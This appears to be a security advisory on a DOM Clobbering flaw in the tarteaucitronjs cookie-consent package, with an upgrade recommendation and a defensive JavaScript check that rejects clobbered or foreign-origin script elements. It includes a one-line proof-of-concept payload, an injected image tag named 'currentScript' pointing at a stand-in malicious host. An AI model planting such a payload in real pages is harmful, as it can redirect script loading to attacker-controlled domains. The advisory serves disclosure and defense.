Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Upgrade tarteaucitronjs to version 1.22.0 or higher.
tarteaucitronjs is a package that provides compliance to the European cookie law.
Affected versions of this package are vulnerable to DOM Clobbering when setting the document.currentScript value. An attacker can cause incorrect script resolution and potentially alter the CDN domain by injecting a DOM element with a conflicting name attribute.
<img name="currentScript" src="https://malicious.example.com">
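A defensive pattern for code that derives its base URL from document.currentScript, shown as an added example (it is not the tarteaucitronjs patch or Snyk's code): accept the value only when it is a genuine script element served from an expected origin. The origins, fallback URL and function names are assumptions for illustration, and the DOM objects are constructed stand-ins so the block runs under Node.

```javascript
// ALLOWED_ORIGINS and FALLBACK_BASE are constructed placeholder values.
const ALLOWED_ORIGINS = new Set(['https://cdn.example.org']);
const FALLBACK_BASE = 'https://cdn.example.org/fallback/';

// Returns the directory URL of the executing script, or FALLBACK_BASE when
// document.currentScript is not a genuine <script> from an allowed origin.
// ScriptElement is injectable so the check can be exercised outside a browser.
function resolveScriptBase(doc, ScriptElement = globalThis.HTMLScriptElement) {
  const candidate = doc.currentScript;
  // A clobbering <img name="currentScript"> is an HTMLImageElement, so the
  // instanceof test rejects it even though it also exposes a .src property.
  if (typeof ScriptElement !== 'function' || !(candidate instanceof ScriptElement)) {
    return FALLBACK_BASE;
  }
  let url;
  try {
    url = new URL(candidate.src);
  } catch {
    return FALLBACK_BASE; // inline script (empty src) or unparsable value
  }
  if (!ALLOWED_ORIGINS.has(url.origin)) {
    return FALLBACK_BASE; // real script element, but not from an expected host
  }
  // Drop the file name, query and fragment; keep the directory.
  return url.origin + url.pathname.replace(/[^/]*$/, '');
}

// Constructed stand-ins for DOM objects (no browser needed to run this).
class FakeScriptElement {
  constructor(src) { this.src = src; }
}
const genuineDoc = {
  currentScript: new FakeScriptElement('https://cdn.example.org/lib/loader.js?v=1'),
};
// What document.currentScript yields once the <img> above has clobbered it.
const clobberedDoc = {
  currentScript: { tagName: 'IMG', src: 'https://malicious.example.com/' },
};
const foreignDoc = {
  currentScript: new FakeScriptElement('https://other.example.net/lib/loader.js'),
};

console.log(resolveScriptBase(genuineDoc, FakeScriptElement));   // script's own directory
console.log(resolveScriptBase(clobberedDoc, FakeScriptElement)); // fallback
console.log(resolveScriptBase(foreignDoc, FakeScriptElement));   // fallback
```

In a browser, call resolveScriptBase(document) and let the second argument default to HTMLScriptElement.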